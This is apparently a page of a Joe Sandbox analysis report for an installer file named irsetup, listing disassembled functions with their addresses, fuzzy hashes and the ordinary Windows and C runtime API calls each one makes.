Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
Instruction ID: e70739f4f642107e89704e3f638af8b430b091e6b205e4125928beaead29ef60
Opcode Fuzzy Hash: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
Instruction Fuzzy Hash: 1531F332611A8841E793AFA6A8417EE3651B7897F0F52C316FE3907BD6CE38C245C700

Function 0000000180032D98 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032DC1
_errno.LIBCMT ref: 0000000180032DCA
__doserrno.LIBCMT ref: 0000000180032E19
_errno.LIBCMT ref: 0000000180032E20

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
Instruction ID: d9038f30b84bd084f134f145b4ea9161b6956bb9982c7eca4ea7920d869c151e
Opcode Fuzzy Hash: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
Instruction Fuzzy Hash: 20310432610A9841E793AF26A8427EE3651B789BE0F52C616BE650B7D2CF38C6098700

Function 000000018002C68C Relevance: 12.1, APIs: 8, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002C6AB
_errno.LIBCMT ref: 000000018002C6B4
__doserrno.LIBCMT ref: 000000018002C704
_errno.LIBCMT ref: 000000018002C70B

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
Instruction ID: ec033c54c6d7d521fc6e23a01929881988fa191f7bf2fc9d76832262eb4df226
Opcode Fuzzy Hash: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
Instruction Fuzzy Hash: 5131E132614ADC41E7A3AF35A841BAE3751B7897E0F65C616FA25077D2CF38C6088B02

Function 00000001800305E8 Relevance: 12.0, APIs: 8, Instructions: 50synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030612
GetExitCodeProcess.KERNEL32 ref: 0000000180030624
GetLastError.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030633
_errno.LIBCMT ref: 000000018003063E
__doserrno.LIBCMT ref: 0000000180030649
GetLastError.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030656
CloseHandle.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 000000018003066A
_errno.LIBCMT ref: 000000018003067D

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorLast_errno$CloseCodeExitHandleObjectProcessSingleWait__doserrno
String ID:
API String ID: 280878599-0
Opcode ID: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
Instruction ID: 68bd96f5714e3ffe11f7f818daa76e97712db3409049de95b658a461dfe5d033
Opcode Fuzzy Hash: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
Instruction Fuzzy Hash: 1511003060168882EBE35FA5A5503BE2760A78DBF0F26C310F976037E9CE38C659CB01

Function 000000018002C830 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 000000018002C855

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

GetFileType.KERNEL32 ref: 000000018002C9D2

Strings

@, xrefs: 000000018002CACD

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID: @
API String ID: 1527402494-2766056989
Opcode ID: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
Instruction ID: 230c68c653191f54178d303bf2b0e4d8cf0cc3789bfed5754acc8c55ed461bfd
Opcode Fuzzy Hash: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
Instruction Fuzzy Hash: 43916232214A8881E7A3CB29D448BA827A5F3097F8F65C715E679473E1DF79C94AC313

Function 000000018001FBE8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018001FC28
_errno.LIBCMT ref: 000000018001FDE2

Strings

+, xrefs: 000000018001FCC5
-, xrefs: 000000018001FCBA
0, xrefs: 000000018001FCF3
0, xrefs: 000000018001FD21

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: +$-$0$0
API String ID: 3432092939-699404926
Opcode ID: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
Instruction ID: cdf1d1b669f77c7e48de24e0b0f5a27944c92b146814c4b507a9b0648c28b355
Opcode Fuzzy Hash: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
Instruction Fuzzy Hash: 2B71D332904E8C81F7F78A25E4553FA26D2B7897D4F29C116FF56023D1DF68CA498342

Function 000000018000DA70 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180021DF4: _errno.LIBCMT ref: 0000000180021D4F

_errno.LIBCMT ref: 000000018000DAC6

Part of subcall function 000000018000D9B0: _fread_nolock.LIBCMT ref: 000000018000DA0F

Strings

invalid format, xrefs: 000000018000DC1E
%lf, xrefs: 000000018000DBC3
invalid option, xrefs: 000000018000DB9E
too many arguments, xrefs: 000000018000DB08

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_fread_nolock
String ID: %lf$invalid format$invalid option$too many arguments
API String ID: 1771911937-3304058045
Opcode ID: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
Instruction ID: 4ecbb218ed77667f7209945df211a99de47e7cbe1f5077c6477dde9f3f5f1065
Opcode Fuzzy Hash: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
Instruction Fuzzy Hash: 9A51F13120464C86FAE7E62656517FE73416B8EBE0F85C112BD060B7C7DE28CB0E8391

Function 0000000180033098 Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800330B1
_errno.LIBCMT ref: 00000001800330FE

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
Instruction ID: 529fb29261052428e6b08158eb4e60c077481b13b416dc635a86f518e286f846
Opcode Fuzzy Hash: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
Instruction Fuzzy Hash: 1931F631B10A8C45F7A7AF79A8963EF2751A7897D0F16C61DBA25073D2CF788608C704

Function 00000001800213B4 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800213D7

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errno
String ID:
API String ID: 3485708101-0
Opcode ID: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
Instruction ID: a4978cb5b150d70a31ac02c29fe7af899a0e20301038a663c4a8e9806da71e5f
Opcode Fuzzy Hash: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
Instruction Fuzzy Hash: 4421D73171068886F793BB25D4113EE6351B7997D5F14C512BA5D0BAC3DF78CA08C701

Function 000000018002D20C Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 000000018002D233

Part of subcall function 000000018002F154: GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217

Part of subcall function 000000018002082C: ExitProcess.KERNEL32 ref: 000000018002083B

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

_errno.LIBCMT ref: 000000018002D275
_lock.LIBCMT ref: 000000018002D289
free.LIBCMT ref: 000000018002D2AB
_errno.LIBCMT ref: 000000018002D2B0
LeaveCriticalSection.KERNEL32(?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC,?,?,?,000000018001E8ED), ref: 000000018002D2D6

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
String ID:
API String ID: 1024173049-0
Opcode ID: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
Instruction ID: 6158d1e52bbdfd4d1479ce80147eb334c54af6b62df8d85375debdae957d05bd
Opcode Fuzzy Hash: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
Instruction Fuzzy Hash: CD215831615A4C82F6E7AB50A9403EA6395A79D7C4F05C026BA4A877C6CFB8CA4C8340

Function 000000018002FEF8 Relevance: 10.5, APIs: 7, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002FF05
_errno.LIBCMT ref: 000000018002FF0D

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

GetFileAttributesA.KERNEL32 ref: 000000018002FF3A
GetLastError.KERNEL32 ref: 000000018002FF45
_errno.LIBCMT ref: 000000018002FF52

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$AttributesDecodeErrorFileLastPointer__doserrno
String ID:
API String ID: 24609805-0
Opcode ID: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
Instruction ID: 62db423ae1bf48e4f4470d80ab43833ba7cfcbac53acf032b2a4a70ed809b53f
Opcode Fuzzy Hash: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
Instruction Fuzzy Hash: 2B019E7161058C46FBF36B789A123FE23905F8E3D0F84C635FA15423CACE284A088711

Function 0000000180026160 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 000000018002618C
_set_exp.LIBCMT ref: 000000018002624A
_ctrlfp.LIBCMT ref: 000000018002628C

Part of subcall function 0000000180034090: _umatherr.LIBCMT ref: 00000001800340C9

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _ctrlfp$_set_exp_umatherr
String ID:
API String ID: 3511029064-0
Opcode ID: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
Instruction ID: b049e6e4e90f587d1ae26f8248ab9d02cc25cde2fa3ace03e7f94499fe5c5a36
Opcode Fuzzy Hash: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
Instruction Fuzzy Hash: 33413871E08E4C85F6A35A3489513EEA385DF9E3D5F11C325B9022B6F6DF18969E4300

Function 000000018003ABF8 Relevance: 9.1, APIs: 6, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

__initconout.LIBCMT ref: 000000018003AC26

Part of subcall function 000000018003E2DC: CreateFileA.KERNEL32 ref: 000000018003E305

WriteConsoleW.KERNEL32 ref: 000000018003AC52
GetLastError.KERNEL32 ref: 000000018003AC6D
GetConsoleOutputCP.KERNEL32(?,?,?,?,0000000180032960,?,?,?,00000001,00000000,?,00000001,0000000180032E64,?,00000000,?), ref: 000000018003AC7F
WideCharToMultiByte.KERNEL32 ref: 000000018003ACB2
WriteConsoleA.KERNEL32 ref: 000000018003ACD8

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
String ID:
API String ID: 2210154019-0
Opcode ID: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
Instruction ID: 99c728c995c363288e4645a8cfd7ec9812841acb19d10564c0c81df42c91df12
Opcode Fuzzy Hash: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
Instruction Fuzzy Hash: FF317135614A8C86FBA2CB10E8443A76361F78A7B8F619315F66A066E4CF7DC78D8740

Function 000000018002C254 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C25E
FlsGetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C26C
SetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C2C4

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

FlsSetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C298
free.LIBCMT ref: 000000018002C2BB

Part of subcall function 000000018002C1A0: _lock.LIBCMT ref: 000000018002C1F0
Part of subcall function 000000018002C1A0: _lock.LIBCMT ref: 000000018002C210

GetCurrentThreadId.KERNEL32 ref: 000000018002C2AC

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
Instruction ID: 0dfceef3c332b8433fd22f826c40fe3083664a76df6c8c25525dd3dfe5458ebd
Opcode Fuzzy Hash: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
Instruction Fuzzy Hash: 63017135201B08C2FBE79BA5A5847A92391AB4CBE0F09C625F926423D5DE38D64D8711

Function 0000000180036640 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 000000018003665E

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180036670
free.LIBCMT ref: 0000000180036682
free.LIBCMT ref: 0000000180036694
free.LIBCMT ref: 00000001800366A6
free.LIBCMT ref: 00000001800366B8
free.LIBCMT ref: 00000001800366CA

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
Instruction ID: 4b4e489caf5932047fa857d54ce27d1b13f5d9450eda61c6167a0ffc8242f040
Opcode Fuzzy Hash: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
Instruction Fuzzy Hash: 1F01AD72600C0C91EBE3EB61D4A23F96360A7CC7C8F46C043F51E876A6CE24DB888725

Function 00000001800366D8 Relevance: 7.7, APIs: 6, Instructions: 246COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 0000000180036758
free.LIBCMT ref: 000000018003677F
free.LIBCMT ref: 0000000180036A50
free.LIBCMT ref: 0000000180036A5C

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
Instruction ID: a769455a77138ef5747765841ac36d0ccc4094dbcb8b52754ceed79c47d1f62a
Opcode Fuzzy Hash: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
Instruction Fuzzy Hash: EEB17332714B8885EBA3DF62E4507DAB7A4F789BC4F408126BA8E47795DF38C219C740

Function 0000000180033C78 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000000180033CB2
_set_statfp.LIBCMT ref: 0000000180033CD0
_set_statfp.LIBCMT ref: 0000000180033CF9
_set_statfp.LIBCMT ref: 0000000180033EB8

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
Instruction ID: 12e77770c186e875bdaf3e9738c6c902f4d3ba9da1e990d93e387186277e3745
Opcode Fuzzy Hash: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
Instruction Fuzzy Hash: 0851A832514D8C85F2F79F34B4963EBA351BB4A7D4F12C219BA562A5E0EF348B8D8700

Function 00000001800216AC Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800216D0

Part of subcall function 000000018002D20C: _FF_MSGBANNER.LIBCMT ref: 000000018002D233

_errno.LIBCMT ref: 00000001800216F2
_lock.LIBCMT ref: 0000000180021703
_errno.LIBCMT ref: 000000018002184A

Memory Dump Source

Source File: 00000002.00000002.4678639746.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4678590235.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678718171.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678775852.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4678805673.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_lock
String ID:
API String ID: 8016435-0
Opcode ID: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
Instruction ID: d9f390f5e57b81c544825edcb0cf6f397babacc6c857381744f7d8a64d4c1da9
Opcode Fuzzy Hash: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
Instruction Fuzzy Hash: 87518F322047888AFBE79B2694417EE63A1F7A8BC5F54C015FE4947B86DF38CA0D8701

Function 000000018002ECF4 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 000000018002ED2D
_exception_enabled.LIBCMT ref: 000000018002ED54

Part of subcall function 000000018002EC38: _set_statfp.LIBCMT ref: 000000018002EC5F
Part of subcall function 000000018002EC38: _set_statfp.LIBCMT ref: 000000018002ECD2

_raise_exc.LIBCMT ref: 000000018002EDB9
_call_matherr.LIBCMT ref: 000000018002EDFC
_ctrlfp.LIBCMT ref: 000000018002EE14

Memory Dump Source

